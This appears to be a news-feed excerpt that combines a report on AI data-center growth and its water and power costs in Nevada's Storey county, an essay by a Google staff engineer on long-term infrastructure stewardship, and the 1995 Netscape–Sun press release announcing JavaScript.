Once home to gold and prospectors, the Nevada desert is now the site of a new kind of expansion: tech data centers Driving down the interstate through the dry Nevada desert, there are few signs that a vast expanse of new construction is hiding behind the sagebrush-covered hills. But, just beyond a ...
Original Article

Driving down the interstate through the dry Nevada desert, there are few signs that a vast expanse of new construction is hiding behind the sagebrush-covered hills. But, just beyond a massive power plant and transmission towers that march up into the dusty brown mountains, lies one of the world’s biggest buildouts of data centers – miles of new concrete buildings that house millions of computer servers.

This business park, called the Tahoe-Reno Industrial Center, has a sprawling landmass greater than the city of Denver. It is home to the largest data center in the US, built by the company Switch, and tech giants like Google and Microsoft have also bought land here and are constructing enormous facilities. A separate Apple data center complex is just down the road. Tesla’s gigafactory, which builds electric vehicle batteries, is a resident too.

In the mid-1800s, this area was an Old West boomtown. It’s situated in Storey county where one of the largest deposits of gold and silver in the American west was discovered, lending it the name: “The Richest Place on Earth”. It’s where Mark Twain came to be a miner, then got his start as a writer for the local newspaper. He later wrote about it in his book Roughing It, saying: “The ‘flush times’ were in magnificent flower … money was as plenty as dust.”

The gold rush is long history, but Storey county is once again one of the fastest growing economies in Nevada. A new boom is happening here in the high desert – fueled by artificial intelligence.

The burgeoning tech, which Silicon Valley vows will be the next frontier for humanity, is minting unfathomable trillion-dollar valuations . It’s a product that’s still being tested, and there’s uncertainty as to how exactly it will transform the economy. But that hasn’t stopped its real-world infrastructure from being built at mass capacity and record speed – a frenzy buoyed by hundreds of billions in venture capital funding .

Desert vegetation with water from the Tahoe‑Reno Industrial Center’s reservoir in the background.

Microsoft, working with OpenAI, announced last month that it plans to double its data-center footprint over the next two years. Amazon, partnering with Anthropic, just opened a major cluster with plans for more. Google, Meta and Oracle are preparing vast buildouts, as is a consortium of companies working with the Trump administration on a $500bn project called Stargate. In all, estimates by consulting firm McKinsey and Company peg global spending on AI data centers to total nearly $7tn by 2030 – nearly twice as much as the GDP of the UK.

The buildup comes at a cost. As the planet’s most powerful companies race to fulfill their dreams of artificial general intelligence – a futuristic version of AI that can perform tasks as well as humans – it means an ever-increasing need for computing power. AI requires far more energy and water than other internet tasks. A ChatGPT query needs nearly 10 times as much electricity as an internet search without AI. And because supercomputers run hot, they typically need intensive water-cooling systems. As data centers continue to multiply in communities around the world – from Frankfurt to Johannesburg – AI’s thirst for power and water shows no signs of letting up.

In a place such as Storey county, which is on the frontline of the climate crisis and has an average rainfall of roughly 11in a year, some locals fear the data centers’ demands could decimate already scarce resources.

That includes the Pyramid Lake Paiute, a Native American tribe, which has lived downriver from where the industrial center now sits, since long before Europeans arrived in the Americas.

Switch data center at the Tahoe‑Reno Industrial Center.

“Everyone cannot keep moving to a space that has no resources. Nevada is completely over-allocated on its ground water resources. It’s the driest state in the union,” said Steven Wadsworth, the tribe’s chairman. “Our tribe’s number one goal is protecting our resources. And it makes it difficult when we have partners upstream who are blissfully unaware.”

‘Miracle in the desert’

On a chilly fall day in October, Kris Thompson hopped into his SUV to take a drive. He has a gravelly voice and fading grey hair and works for Gilman Commercial Real Estate Service, which has been the industrial center’s exclusive brokerage firm since its founding in 1998. As he turned onto USA Parkway, the 18-mile highway that cuts through the park, he pointed out the tall yellow cranes dotting the landscape and the constant stream of semi-trucks rumbling by. “You’re gonna see a lot of hard hats and heavy equipment,” he said.

“When I first came up here, there was nothing but desert dirt trails, coyotes, and rabbitbrush,” Thompson said. “Nothing else was here. No roads, no water wells, no businesses, no drainage, no sewer system, nothing.”

Now, the entire area looks like a city being built from the ground up.

“How do you take 160-sq-miles of desert, of high desert in the mountains, and turn that, 25 years later, into the hottest tech and data center development in the United States?” Thompson asked rhetorically. “They had some cowboys up there, and they were willing to think outside the box.”

Satellite map showing the scale of the Tahoe Reno Industrial Center

One of the cowboy masterminds is Lance Gilman, who also owns the Mustang Ranch brothel. He and his partners bought most of the property from the Gulf Oil company in the late 1990s, which had planned to use the expanse of land for a corporate hunting retreat.

Gilman and his western crew were property developers who struck it big on what Thompson said “has to be the greatest real estate deal ever made on the planet”. They paid $20m to buy a vast private ranch – covering more than 100,000 acres – and created the Tahoe-Reno Industrial Center. It has no residential properties and pre-approves most industrial and commercial uses. Essentially, it can fast track the local government permit process.

The center’s swift permitting hooked Tesla into setting up its first gigafactory there in 2014. The company bought 3,300 acres (13.4 sq km), which span an entire mountain, and immediately set to work building a 6m-sq-ft foundation (nearly 560,000 sq meters) for its battery facility. Tesla convinced the county to rename the road leading to its property, “Electric Avenue”.

Pyramid Lake, at the Pyramid Lake Paiute Reservation, is fed by the Truckee River and is located about 40 miles north-east of Reno.

“That put us up on the global stage,” Thompson said of the mega-manufacturing facility. “That speed is everything. In this economy, if it takes you two or three years to get a permit to start building, your product could be obsolete by that point.”

Switch, which builds and operates some of the world’s largest data centers and rents them to a variety of clients, came next, then Google, Microsoft and more. These companies purchased thousands of acres of land to build their data centers. Tract, which has a similar business model to Switch, purchased 11,000 total acres (44.5 sq km) and pledged to invest $100bn into its data center project.

A Gold Rush-esque boom and bust has already come for the industrial park once before. One of the biggest buyers in 2018, four years before the release of ChatGPT, was multimillionaire Jeffrey Berns, who threw down $170m in cash to acquire 67,000 acres (271 sq km) – roughly two-thirds of the park – through his company Blockchains. His goal was to transform the place into a cryptocurrency utopia, which he described to the Guardian as having a “blockchain based self-sovereign identity that eliminated the need for many politicians and governmental agencies”.

That plan didn’t pan out. So, Blockchains sold 2,200 acres (8.9 sq km) to Tract for $250m and plans to offer long-term leases on the remaining acreage. Berns said he’s now focusing on building a billion-dollar bunker in Switzerland.

Every square foot of Gilman’s land at the industrial center has been sold, according to Thompson. What’s available now are parcels that are being resold. Thompson said the fact that those cowboys were able to transform the dusty landscape into a “tech city” is nothing short of a “miracle in the desert”.

A water truck sprays near a construction site at the Tahoe‑Reno Industrial Center.

Driving through the tech city, it’s impossible to see the full extent of each company’s construction projects. Google’s complex is triple-fenced and only accessible by private roads. The same goes for other companies, some of which are buried behind desert mountains and towering walls. These businesses are notoriously secretive , citing the need to protect trade secrets, and their security patrols don’t take kindly to curious strangers.

On three separate occasions, private guards told the Guardian to move along when parked on what seemed to be public roads. In one instance, a guard drove up and walked over to the driver-side window. “What are you doing?” he asked curtly. As he peered through the window, he smiled broadly and tilted his head, showing that he was wearing Meta’s smart glasses with the red video recording light turned on.

‘We know what happens when we don’t fight for the water’

Pyramid Lake is the largest lake in Nevada. Situated at the base of several mountain ranges, the lake is owned by the Pyramid Lake Paiute Tribe and entirely surrounded by the tribe’s reservation. They have lived in the region for thousands of years. The Pyramid Lake Paiute’s petroglyphs date back 10,000 to 14,000 years, the oldest in North America.

Steven Wadsworth, chairman of the Pyramid Lake Paiute Tribe.

Wadsworth, the tribal chairman, recognizes the need for data centers, but worries if the ones upriver aren’t kept in check, they could intensify threats to the lake – which is the lifeblood for the tribe. The Truckee River supplies the industrial center with water and also serves as the primary source of water for Pyramid Lake.

“It’s not like we’re out here to be a pain,” Wadsworth said. “We know the destruction.”

In the tribe’s governmental office, Wadsworth, sporting waist-length hair and a white button-up tucked into slacks, walked over to a giant satellite map showing the region’s watershed – from California’s mountains to Nevada’s Great Basin. Next to the deep green of Pyramid Lake is a large, flat, white mass, the remnants of a second lake.

“We know what happens when we don’t fight for the water,” Wadsworth said, pointing to the white mass. “This lake used to be full.”

Lake Winnemucca was once fed by Pyramid Lake, but when the Truckee River was dammed in the early 1900s, Wadsworth said it took less than 30 years for Pyramid Lake to drop 80ft and Lake Winnemucca to dry.

The tribe has been fighting for decades now to protect Pyramid Lake and the native fish that inhabit it, including the endangered cui-ui and the threatened Lahontan cutthroat trout. Some of its efforts include purchasing thousands of acre-feet (one acre-foot is equivalent to 1,233 cubic meters) of water rights and bringing several lawsuits over the years. The tribe also lodged complaints with the local Truckee Meadows Water Authority to ensure any water the industrial park siphons from the river is replenished, according to the MIT Technology Review.

AI data centers need copious amounts of water. Over the last 10 years, data center water use has tripled to more than 17bn gallons (64bn liters) per year in the US, according to a Department of Energy report. Much of that is attributed to the “rapid proliferation of AI servers” and is expected to multiply to nearly 80bn gallons (303bn liters) by 2028. While the figure pales against total US water use, 117tn gallons per year in 2015, it still can mean a struggle to meet the demands of both human beings and hot computer chips.

An area near the dry lake bed of what was once Lake Winnemucca, near Nixon, Nevada.

And as data centers continue to proliferate in water-stressed areas around the globe, which can offer cheap land and energy as well as low humidity for easier chip cooling, one of the central concerns in local communities is what happens if the water runs dry.

A large data center using evaporative water cooling consumes around 1m gallons a day, said Shaolei Ren, an associate professor at the University of California at Riverside. He studies AI water consumption and said non-evaporative water-cooling technology can diminish water use, but it’s a balancing act because those systems need more electricity, which, in turn, requires more water.

“Water and energy are not separable,” Ren said.

The industrial park built a reclaimed water reservoir for its data center clients that went into operation in 2023. The project, which cost upwards of $100m, involved constructing a 21-mile pipeline to pump effluent from a wastewater treatment plant to the industrial park. While seen as an alternative to taking water directly from the Truckee River, Wadsworth said the effluent previously would’ve been treated and deposited back into the river. So, the tribe still got involved to ensure the river maintained its flow.

Some environmentalists question putting data centers in any drought-prone region, especially as the climate crisis accelerates.

Kyle Roerink, executive director of the Great Basin Water Network.

“This place is being touted as the epicenter of the energy revolution, the data revolution, the tech revolution,” said Kyle Roerink, the executive director of the Great Basin Water Network, which works to protect water resources in the region. “But they’re never going to be making water.”

‘We just don’t have the power capacity’

The largest data center in the US is tucked into the industrial park. The sleek grey building with red accents is more than half a mile long, 1.3m-sq-ft, and has the capacity for 130 megawatts of electricity – enough to power 100,000 homes a year. It’s owned by Switch and was the company’s first data center in what is now a sprawling campus called “The Citadel.”

The “Citadel” does give the impression of a fortress. Its entrance sits high on a giant pile of crushed rocks surrounded by 20-ft cement walls topped with dagger-like iron stakes. Guests drive in through a metal gate, and security guards in bullet-proof vests hold visitors’ IDs for the duration of their visit.

The campus, which comes with its own power substation and water reservoir, has multiple gargantuan data centers terraced up into a valley, and Switch is building several more. The company says that when the Citadel is done, it will have approximately 10m-sq-ft (930,000 sq meters) of data centers combined.

Inside Switch’s biggest data center, Reno 1, noisy wall-sized fans blow air over the computers to keep them cool. Rows of identical servers behind black mesh gates line long aisles, an infinite, blinking hall of mirrors. The room is dimly lit except for the servers’ blue and green LEDs as they perform incredibly complex computations.

Power lines run along Interstate 80 outside Reno, Nevada.

Data centers like this are cropping up worldwide, which means not only an intensified strain on water, but also power. Google wrote in its latest sustainability report that it has seen a 51% increase in carbon emissions in its operations since 2019, while Microsoft had a 23% increase since 2020. Amazon and Meta also saw increases over the last few years, with rises of 33% and 64%, respectively. Some researchers say those are undercounts .

The International Energy Agency estimates total electricity consumption from data centers worldwide could double by 2026 from 2022 levels – roughly equal to the annual electricity use of the entire country of Japan. In the US, about 60% of electricity comes from burning fossil fuels, a predominant driver of the climate crisis.

“These are large cities in terms of their electricity consumption,” Ari Peskoe, the director of Harvard’s Electricity Law Initiative, said of data centers. “And then, utilities and other power generators are having a massive buildout of natural gas-fired power plants to support this growth.”

Some companies, like Elon Musk’s xAI, have added huge temporary methane gas generators to supply additional energy to their facilities. And, in data center-heavy regions across the US, plans to decommission coal plants have been delayed to keep electricity flowing. Research analysts for Goldman Sachs say they “expect the proliferation of AI technology, and the data centers necessary to feed it, to drive an increase in power demand the likes of which hasn’t been seen in a generation”.

The power plant that serves the industrial center runs on natural gas and is owned by NV Energy, a utility acquired by Warren Buffett’s Berkshire Hathaway in 2013. The utility has received regulatory approval for at least four new natural gas units over the last couple of years. Meghin Delaney, a company spokesperson, said NV Energy also has several renewable energy projects and requires large energy users, like data centers, to “cover transmission and distribution costs upfront before new projects are built”.

Google data center at the Tahoe‑Reno Industrial Center in Storey county, Nevada.

One of Switch’s focuses is green design and energy efficiency. The company says its data centers are completely powered by renewable energy: whatever it draws from natural gas facilities, it matches by feeding power from solar and wind projects back into the grid. Jason Hoffman, the chief strategy officer for Switch, said the company has spent more than “$20bn in 100% green financing since 2024”. Switch was also a major sponsor of the reclaimed water reservoir at the industrial center.

Google, Amazon, Microsoft, Meta and Apple are also tapping into solar and wind to fuel their data center ambitions. Some tech giants are investing in nuclear and geothermal energy. Apple says its data centers in the Reno area run entirely on solar power.

Tesla, Meta and Tract did not respond to requests for comment. Spokespeople for Microsoft, Apple and Amazon declined to comment but pointed the Guardian to their companies’ sustainability reports. Chrissy Moy, a Google spokesperson, said the company uses air cooling in its Storey county data centers; despite a rise in carbon emissions, she said Google saw a 12% reduction in data center energy emissions in 2024, which the company attributes to “bringing new clean energy online”.

Kris Thompson points to a map of the Tahoe‑Reno Industrial Center in Storey county.

On the reservation at Pyramid Lake, Wadsworth said rolling brownouts are common during the hot summer months. “Right around 5 o’clock, everybody gets home, and the power will dip multiple times,” he said. He’s concerned it will only get worse with the deluge of data centers, adding, “We just don’t have the power capacity to keep running all of these things.”

Wild horses

Back on the USA Parkway, Thompson steered his SUV through the industrial center’s mountains. He said about 75% of the calls he now gets are from businesses wanting to secure land for data centers. Thompson has spent years on this land, and its development is a point of pride. So is its preservation. He looked out at the arid terrain, gesturing to a cluster of scruffy pinyon pines and rabbitbrush that painted the hillside yellow with blooms. A pair of wild horses grazed nearby.

Horses graze at the Tahoe‑Reno Industrial Center in Storey county, Nevada.

Thompson said the park and its high-tech residents do what they can to protect the horses, which were originally brought to the Americas by Spanish conquistadors and now run wild throughout Nevada’s deserts. The horses are seen by some as controversial, as herds can overrun the hills, trampling the distinct natural landscape. But, in the industrial park, the tech companies love them, Thompson said.

“You know, these tech rogues see themselves in the wild horses,” Thompson said. “They’re independent, they’re running free, they’re self-reliant, they’re doing their own thing.” Which sometimes means a trampling stampede.

tunnl.gg | Expose localhost to the internet

Lobsters
tunnl.gg
2025-12-04 11:44:00
Comments...

Why I Ignore The Spotlight as a Staff Engineer

Lobsters
lalitm.com
2025-12-04 11:34:59
Comments...
Original Article

Lately I’ve been reading Sean Goedecke’s essays on being a Staff+ engineer. His work (particularly Software engineering under the spotlight and It’s Not Your Codebase) is razor-sharp and feels painfully familiar to anyone in Big Tech.

On paper, I fit the mold he describes: I’m a Senior Staff engineer at Google. Yet, reading his work left me with a lingering sense of unease. At first, I dismissed this as cynicism. After reflecting, however, I realized the problem wasn’t Sean’s writing but my reading.

Sean isn’t being bleak; he is accurately describing how to deal with a world where engineers are fungible assets and priorities shift quarterly. But my job looks nothing like that, and I know deep down that if I tried to operate in that environment or in the way he described, I’d burn out within months.

Instead I’ve followed an alternate path, one that optimizes for systems over spotlights, and stewardship over fungibility.

We Live in Different Worlds

The foundational reason for our diverging paths is that Sean and I operate in entirely different worlds with different laws governing them.

From Sean’s resume, my understanding is that he has primarily worked in product teams 1 building for external customers. Business goals pivot quarterly, and success is measured by revenue or MAU. Optimizing for the “Spotlight” makes complete sense in this environment. Product development at big tech scale is a crowded room: VPs, PMs and UX designers all have strong opinions. To succeed, you have to be agile and ensure you are working specifically on what executives are currently looking at.

On the other hand, I’ve spent my entire career much more behind the scenes: in developer tools and infra teams.

My team’s customers are thousands of engineers in Android, Chrome, and throughout Google 2. End users of Google products don’t even know we exist; our focus is on making sure developers have the tools to collect product and performance metrics and debug issues using detailed traces.

In this environment, our relationship with leadership is very different. We’re never the “hot project everyone wants,” so execs are not fighting to work with us. In fact, my team has historically struggled to hire PMs. The PM career ladder at Google incentivizes splashy external launches, so we cannot provide good “promotion material” for them. Also, our feedback comes directly from engineers. Adding a PM in the middle causes a loss in translation, slowing down a tight, high-bandwidth feedback loop.

All of this together means our team operates “bottom-up”: instead of execs telling us “you should do X”, we figure out what we think will have the most impact to our customers and work on building those features and tools. Execs ensure that we’re actually solving these problems by considering our impact on more product facing teams.

Compounding Returns of Stewardship

In the product environments Sean describes, where goals pivot quarterly and features are often experimental, speed is the ultimate currency. You need to ship, iterate, and often move on before the market shifts. But in Infrastructure and Developer Experience, context is the currency.

Treating engineers as fungible assets destroys context. You might gain fresh eyes, but you lose the implicit knowledge of how systems actually break. Stewardship, staying with a system long-term, unlocks compounding returns that are impossible to achieve on a short rotation.

The first is efficiency via pattern matching . When you stay in one domain for years, new requests are rarely truly “new.” I am not just debugging code; I am debugging the intersection of my tools and hundreds of diverse engineering teams. When a new team comes to me with a “unique” problem, I can often reach back in time: “We tried this approach in 2021 with the Camera team; here is exactly why it failed, and here is the architecture that actually works”.

But the more powerful return is systemic innovation . If you rotate teams every year, you are limited to solving acute bugs that are visible right now . Some problems, however, only reveal their shape over long horizons.

Take Bigtrace, a project I recently led; it was a solution that emerged solely because I stuck around long enough to see the shape of the problem:

  • Start of 2023 (Observation): I began noticing a pattern. Teams across Google were collecting terabytes or even petabytes of performance traces, but they were struggling to process them. Engineers were writing brittle, custom pipelines to parse data, often complaining about how slow and painful it was to iterate on their analysis.

  • Most of 2023 (Research): I didn’t jump to build a production system. Instead, I spent the best part of a year prototyping quietly in the background while working on other projects. I gathered feedback from the same engineers who had complained, and because I had established long-term relationships, their feedback was honest and introspective. I learned what sort of UX, latency and throughput requirements they had and figured out how I could meet them.

  • End of 2023 to Start of 2024 (Execution): We built and launched Bigtrace, a distributed big data query engine for traces. Today, it processes over 2 billion traces a month and is a critical part of the daily workflow for 100+ engineers.

If I had followed the advice to “optimize for fungibility” (i.e. if I had switched teams in 2023 to chase a new project) Bigtrace would not exist.

Instead, I would have left during the research phase and my successor would have seen the same “noise” of engineers complaining. But without the historical context to recognize a missing puzzle piece, I think they would have struggled to build something like Bigtrace.

The Power of “No”

One of the most seductive arguments for chasing the “Spotlight” is that it guarantees resources and executive attention. But that attention is a double-edged sword.

High-visibility projects are often volatile. They come with shifting executive whims, political maneuvering, and often end up in situations where long-term quality is sacrificed for short-term survival. For some engineers, navigating this chaos is a thrill. For those of us who care about system stability, it feels like a trap.

The advantage of stewardship is that it generates a different kind of capital: trust . When you have spent years delivering reliable tools, you earn the political capital to say “No” to the spotlight when it threatens the product.

Recently, the spotlight has been on AI. Every team is under pressure to incorporate it. We have been asked repeatedly: “Why don’t you integrate LLMs into Perfetto?” If I were optimizing for visibility, the answer would be obvious: build an LLM wrapper, demo it to leadership, and claim we are “AI-first.” It would be an easy win for my career.

But as a steward of the system, I know that one of Perfetto’s core values is precision . When a kernel developer is debugging a race condition, they need exact timestamps, not a hallucination. Users trust that when we tell them “X is the problem” that it actually is the problem and they’re not going to go chasing their tail for the next week, debugging an issue which doesn’t exist.

But it’s important not to take this too far: skepticism shouldn’t become obstructionism. With AI, it’s not “no forever” but “not until it can be done right” 3.

A spotlight-seeking engineer might view this approach as a missed opportunity; I view it as protecting what makes our product great: user trust.

The Alternate Currency of Impact

The most common fear engineers have about leaving the “Spotlight” is career stagnation. The logic goes: If I’m not launching flashy features at Google I/O, and my work isn’t on my VP’s top 5 list, how will I ever get promoted to Staff+?

It is true that you lose the currency of “Executive Visibility.” But in infrastructure, you gain two alternate currencies that are just as valuable, and potentially more stable.

Shadow Hierarchy

In a product organization, you often need to impress your manager’s manager. In an infrastructure organization, you need to impress your customers’ managers .

I call this the Shadow Hierarchy. You don’t need your VP to understand the intricacies of your code. You need the Staff+ Engineers in other critical organizations to need your tools.

When a Senior Staff Engineer in Pixel tells their VP, “We literally cannot debug the next Pixel phone without Perfetto” , that statement carries immense weight. It travels up their reporting chain, crosses over at the Director/VP level, and comes back down to your manager.

This kind of advocacy is powerful because it is technical, not political. It is hard to fake. When you are a steward of a critical system, your promotion packet is filled with testimonials from the most respected engineers in the company saying, “This person’s work enabled our success”.

Utility Ledger

While product teams might be poring over daily active users or revenue, we rely on metrics tracking engineering health:

  • Utility: Every bug fixed using our tools is an engineer finding us useful. It is the purest measure of utility.

  • Criticality: If the Pixel team uses Perfetto to debug a launch-blocking stutter, or Chrome uses it to fix a memory leak, our impact is implicitly tied to their success.

  • Ubiquity: Capturing a significant percentage of the engineering population proves you’ve created a technical “lingua franca”. This becomes especially obvious when you see disconnected parts of the company collaborating with each other, using shared Perfetto traces as a “reference everyone understands”.

  • Scale: Ingesting petabytes of data or processing billions of traces proves architectural resilience better than any design doc.

When you combine Criticality (VIP teams need this) with Utility (bugs are being fixed), you create a promotion case that is immune to executive reorganizations.

Archetypes and Agency

Staff Archetypes

I am far from the first to notice that there are multiple ways to be a staff software engineer. In his book Staff Engineer, Will Larson categorizes Staff-plus engineers into four distinct archetypes.

Sean describes the Solver or the Right Hand: engineers who act as agents of executive will, dropping into fires and moving on once the problem is stabilized. I am describing the Architect or the Tech Lead: roles defined by long-term ownership of a specific domain and deep technical context.

The “Luck” Rebuttal

I can hear the criticism already: “You just got lucky finding your team. Most of us don’t have that luxury.”

There are two caveats to all my advice in this post. First, the strategy I have employed so far requires a company profitable enough to sustain long-term infrastructure. This path generally does not exist in startups or early growth companies; it is optimized for Big Tech.

Second, luck does play a role in landing on a good team. It is very hard to accurately evaluate team and company culture from the outside. But while finding the team might have involved luck, staying there for almost a decade was a choice.

And, at least in my experience, my team is not particularly special: I can name five other teams in Android alone 4. Sure, they might have a director change here or a VP change there, but the core mission and the engineering team remained stable.

The reason these teams seem rare is not that they don’t exist, but that they are often ignored. Because they don’t offer the rapid, visible “wins” of a product launch, nor are they working on “shiny cool features”, they attract less competition. If you are motivated by “shipping to billions of users” or seeing your friends and family use something you built, you won’t find that satisfaction here. That is the price of admission.

But if you want to build long-term systems and are willing to trade external validation for deep technical ownership, you just need to look behind the curtain.

Conclusion

The tech industry loves to tell you to move fast. But there is another path. It is a path where leverage comes from depth, patience, and the quiet satisfaction of building the foundation that others stand on.

You don’t have to chase the spotlight to have a meaningful, high-impact career at a big company. Sometimes, the most ambitious thing you can do is stay put, dig in, and build something that lasts. To sit with a problem space for years until you understand it well enough to build a Bigtrace.

If you enjoyed this post, you can subscribe to my weekly roundup of recent posts, or follow via RSS.

30 years ago today "Netscape and Sun announce JavaScript"

Hacker News
web.archive.org
2025-12-04 11:32:00
Comments...
Original Article
Press Releases

NETSCAPE AND SUN ANNOUNCE JAVASCRIPT, THE OPEN, CROSS-PLATFORM OBJECT SCRIPTING LANGUAGE FOR ENTERPRISE NETWORKS AND THE INTERNET

28 INDUSTRY-LEADING COMPANIES TO ENDORSE JAVASCRIPT AS A COMPLEMENT TO JAVA FOR EASY ONLINE APPLICATION DEVELOPMENT


MOUNTAIN VIEW, Calif. (December 4, 1995) -- Netscape Communications Corporation (NASDAQ: NSCP) and Sun Microsystems, Inc. (NASDAQ:SUNW), today announced JavaScript, an open, cross-platform object scripting language for the creation and customization of applications on enterprise networks and the Internet. The JavaScript language complements Java, Sun's industry-leading object-oriented, cross-platform programming language. The initial version of JavaScript is available now as part of the beta version of Netscape Navigator 2.0, which is currently available for downloading from Netscape's web site.

In addition, 28 industry-leading companies, including America Online, Inc., Apple Computer, Inc., Architext Software, Attachmate Corporation, AT&T, Borland International, Brio Technology, Inc., Computer Associates, Inc., Digital Equipment Corporation, Hewlett-Packard Company, Iconovex Corporation, Illustra Information Technologies, Inc., Informix Software, Inc., Intuit, Inc., Macromedia, Metrowerks, Inc., Novell, Inc., Oracle Corporation, Paper Software, Inc., Precept Software, Inc., RAD Technologies, Inc., The Santa Cruz Operation, Inc., Silicon Graphics, Inc., Spider Technologies, Sybase, Inc., Toshiba Corporation, Verity, Inc., and Vermeer Technologies, Inc., have endorsed JavaScript as an open standard object scripting language and intend to provide it in future products. The draft specification of JavaScript, as well as the final draft specification of Java, is planned for publishing and submission to appropriate standards bodies for industry review and comment this month.

JavaScript is an easy-to-use object scripting language designed for creating live online applications that link together objects and resources on both clients and servers. While Java is used by programmers to create new objects and applets, JavaScript is designed for use by HTML page authors and enterprise application developers to dynamically script the behavior of objects running on either the client or the server. JavaScript is analogous to Visual Basic in that it can be used by people with little or no programming experience to quickly construct complex applications. JavaScript's design represents the next generation of software designed specifically for the Internet and is:

  • designed for creating network-centric applications
  • complementary to and integrated with Java
  • complementary to and integrated with HTML
  • open and cross-platform.
Java, developed by Sun, is an object-oriented programming language that operates independent of any operating system or microprocessor. Java programs called applets can be transmitted over a network and run on any client, providing the multimedia richness of a CD-ROM over corporate networks and the Internet. Java has been widely hailed by programmers because it eliminates the need to port applications, and by managers of information systems for its potential to lower the costs of distributing and maintaining applications across the network.

With JavaScript, an HTML page might contain an intelligent form that performs loan payment or currency exchange calculations right on the client in response to user input. A multimedia weather forecast applet written in Java can be scripted by JavaScript to display appropriate images and sounds based on the current weather readings in a region. A server-side JavaScript script might pull data out of a relational database and format it in HTML on the fly. A page might contain JavaScript scripts that run on both the client and the server. On the server, the scripts might dynamically compose and format HTML content based on user preferences stored in a relational database, and on the client, the scripts would glue together an assortment of Java applets and HTML form elements into a live interactive user interface for specifying a net-wide search for information.

Java programs and JavaScript scripts are designed to run on both clients and servers, with JavaScript scripts used to modify the properties and behavior of Java objects, so the range of live online applications that dynamically present information to and interact with users over enterprise networks or the Internet is virtually unlimited. Netscape will support Java and JavaScript in client and server products as well as programming tools and applications to make this vision a reality.

"Programmers have been overwhelmingly enthusiastic about Java because it was designed from the ground up for the Internet. JavaScript is a natural fit, since it's also designed for the Internet and Unicode-based worldwide use," said Bill Joy, co-founder and vice president of research at Sun. "JavaScript will be the most effective method to connect HTML-based content to Java applets."

Netscape's authoring and application development tools -- Netscape Navigator Gold 2.0, Netscape LiveWire and Netscape LiveWire Pro -- are designed for rapid development and deployment of JavaScript applications. Netscape Navigator Gold 2.0 enables developers to create and edit JavaScript scripts, while Netscape LiveWire enables JavaScript programs to be installed, run and managed on Netscape servers, both within the enterprise and across the Internet. Netscape LiveWire Pro adds support for JavaScript connectivity to high-performance relational databases from Illustra, Informix, Microsoft, Oracle and Sybase. Java and JavaScript support are being built into all Netscape products to provide a unified, front-to-back, client/server/tool environment for building and deploying live online applications.

Java is available to developers free of charge. The Java Compiler and Java Developer's Kit as well as the HotJava browser and related documentation are available from Sun's web site at http://java.sun.com. In addition, the Java source code can be licensed for a fee. Details on licensing are also available via the java.sun.com web page. To date, Sun has licensed Java to a number of leading technology companies, including Borland, Macromedia, Mitsubishi, Netscape, Oracle, Silicon Graphics, Spyglass, and Toshiba. Sun's Workshop for Java toolkit is scheduled for release in Spring 1996. Sun's NEO product family, the first complete development, operating and management environment for object-oriented networked applications, will also use Java-enabled browsers as front-ends to the NEO environment.

Netscape and Sun plan to propose JavaScript to the W3 Consortium (W3C) and the Internet Engineering Task Force (IETF) as an open Internet scripting language standard. JavaScript will be an open, freely licensed proposed standard available to the entire Internet community. Existing Sun Java licensees will receive a license to JavaScript. In addition, Sun and Netscape intend to make a source code reference implementation of JavaScript available for royalty-free licensing, further encouraging its adoption as a standard in a wide variety of products.

Netscape Communications Corporation is a premier provider of open software for linking people and information over enterprise networks and the Internet. The company offers a full line of Netscape Navigator clients, Netscape servers, development tools and Netscape Internet Applications to create a complete platform for next-generation, live online applications. Traded on Nasdaq under the symbol "NSCP", Netscape Communications Corporation is based in Mountain View, California.

With annual revenues of $6 billion, Sun Microsystems, Inc. provides solutions that enable customers to build and maintain open network computing environments. Widely recognized as a proponent of open standards, the company is involved in the design, manufacture and sale of products, technologies and services for commercial and technical computing. Sun's SPARC(TM) workstations, multiprocessing servers, SPARC microprocessors, Solaris operating software and ISO-certified service organization each rank No. 1 in the UNIX(R) industry. Founded in 1982, Sun is headquartered in Mountain View, Calif., and employs more than 14,000 people worldwide.

Additional information on Netscape Communications Corporation is available on the Internet at , by sending email to info@netscape.com or by calling 415-528-2555. Additional information on Sun Microsystems is available on the Internet at http://www.sun.com or, for Java information, http://java.sun.com Netscape Communications, the Netscape Communications logo, Netscape, and Netscape Navigator are trademarks of Netscape Communications Corporation. JavaScript and Java are trademarks of Sun Microsystems, Inc. All other product names are trademarks of their respective companies.

WHAT COMPANIES SAY ABOUT JAVASCRIPT

"JavaScript brings the power of rapid multimedia application development with cross-platform mobility at both the operating system and architecture level. We are pleased to integrate this powerful language into our Developer's Program."
Mike Connors
President
America Online Technologies
"JavaScript will allow us to easily create personalized applets for the Excite service. These applets, combined with the rich functionality of the Excite service, will integrate more fully into the users experience as they explore and navigate the Internet."
Graham Spencer
Chief Technology Officer
Architext Software
"AT&T;'s support for JavaScript is more than support for cool technology -- it is support for an open standards process. Open standards are and will be as important to the success of the Internet as open connectivity."
Tom Evslin
Vice President, Gateway Services
AT&T;
"JavaScript and Java represent important steps in the evolution of the Internet and Intranets for business computing. JavaScript allows Internet applications to easily connect to production databases such as CA-OpenIngres, while Java allows easy-to-use, multi-platform Web clients for CA-Unicenter and business applications such as CA-Masterpiece, CA-ManMan/X and CA-Accpac."
Nancy Li
Executive Vice President and CTO
Computer Associates
"Tools like JavaScript will unleash a new wave of creativity and transform the Internet in ways no one can predict. JavaScript and other developments will demand increased system performance, ideally met by Digital's Alpha systems architecture."
Rose Ann Giordano
Vice President, Internet Business Group
Digital Equipment Corporation
"JavaScript is an exciting technology because it represents the next generation of software designed specifically for the Internet. Hewlett-Packard is committed to open standards and is a supporter of JavaScript because it complements Hewlett-Packard's open systems architecture."
Jan Silverman
Director
Hewlett-Packard
"We plan to integrate our automatic document indexing and abstracting technology to leverage the power and functionality of JavaScript. The power and use of our technologies greatly enhances the server and its delivery of timely and valuable documents for web clients."
Robert Griggs
Vice President, Sales and Marketing
Iconovex Corporation
"JavaScript empowers developers to create a powerful new class of multimedia rich applications in a platform-independent development environment. Illustra's unique extensible Object-Relational architecture makes it an ideal intelligent queryable store for content management applications using Java and JavaScript objects."
Dr. Michael Stonebraker
Founder and Chief Technology Officer
Illustra Information Technologies
"JavaScript will benefit users by enabling live online applications. These applications need a powerful database engine for content management. Informix's OnLine Dynamic Server is uniquely suited for these applications. By partnering with Netscape, we are bringing the best in online database and live, interactive technology to web users."
Phil White
Chairman and CEO
Informix Software
"Intuit will take advantage of JavaScript and Netscape's authoring and application development tools to create compelling online financial services. Netscape's open, cross-platform environment allows Intuit to efficiently develop and deploy online applications."
Bill Harris
Executive Vice President
Intuit
